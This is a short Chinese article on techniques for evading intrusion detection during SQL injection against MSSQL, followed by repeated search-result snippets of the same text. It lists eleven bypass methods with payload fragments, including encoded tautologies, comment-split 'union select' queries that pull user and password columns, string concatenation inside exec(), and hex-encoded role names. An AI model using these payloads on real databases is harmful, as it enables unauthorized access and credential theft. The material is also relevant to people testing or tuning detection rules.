當我們對乙個執行ids系統的伺服器進行sql注射時,我們往往會遇到很大的麻煩,因為我們的注射語句被過濾了,如何規避這種檢測手段就成了一門新的技術,本文就對此規避技術提出十一條思路和方法,與大家商戳。
一、 運用編碼技術繞過,如urlencode編碼,ascii編碼繞過。
如or 1=1即%6f%72%20%31%3d%31
test即char(101)+char(97)+char(115)+char(116)
二、 通過空格繞過
如兩個空格代替乙個空格,用tab代替空格等,或者刪除所有空格,如or』swords』=『swords』,由於mssql的鬆散性,我們可以把or 『swords』之間的空格去掉,並不影響執行。
三、 運用字串判斷代替經典的or 1=1判斷繞過
如or 『swords』=『swords』
四、 通過型別轉換修飾符n繞過
如or 『swords』 = n』swords』,大寫的n告訴mssql server 字串作為nvarchar型別,它起到型別轉換的作用,並不影響注射語句本身,但是可以避過基於知識的模式匹配ids。
五、 通過+號拆解字串繞過,
如 or 『swords』=『sw』+』ords』;exec(『in』+』sert into 『+』…..』)
六、 通過like繞過,如or 『swords』 like 『sw』
七、 通過in繞過,如or 『swords』 in (『swords』)
八、 通過between繞過, 如or 『swords』 between 『rw』 and 『tw』
九、 通過》或者《繞過,如
or 『swords』>『sw』
or 『swords』<『tw』
or 1<3
十、 運用注釋語句繞過:
用/**/代替空格,如:
union /**/ select /**/user,pwd,from tbluser
用/**/分割敏感詞,如:
u/**/ nion /**/ se/**/ lect /**/user,pwd from tbluser
十一、 用hex繞過,一般的ids都無法檢測出來。
0x730079007300610064006d0069006e00 =hex(sysadmin)
0x640062005f006f0077006e0065007200 =hex(db_owner)
以上的十一條sql injection規避入侵檢測技術供您參考。
《SQL Injection規避入侵檢測技術總結》
sql injection規避入侵檢測技術總結 sql injection規避入侵檢測技術總結 當我們對乙個執行ids系統的伺服器進行sql注射時,我們往往會遇到很大的麻煩,因為我們的注射語句被過濾了,如何規避這種檢測手段就成了一門新的技術,本文就對此規避技術提出十一條思路和方法,與大家商戳。一 運...
SQL Injection規避入侵檢測技術總結
當我們對乙個執行ids系統的伺服器進行sql注射時,我們往往會遇到很大的麻煩,因為我們的注射語句被過濾了,如何規避這種檢測手段就成了一門新的技術,本文就對此規避技術提出十一條思路和方法,與大家商戳。一 運用編碼技術繞過,如urlencode編碼,ascii編碼繞過。如or 1 1即 6f 72 20...
SQL Injection高階應用
灌一篇水,寫一點關於sql injection的高階應用,針對sql server的。我假設你已經非常了解sql injection的基本概念。目標探測 當大多數人都意識到sql injection的威脅並進行一番修補之後,可能很難再找到下手的地方。但若想成功就必需要冷靜耐心,當然有時也需要一點點運...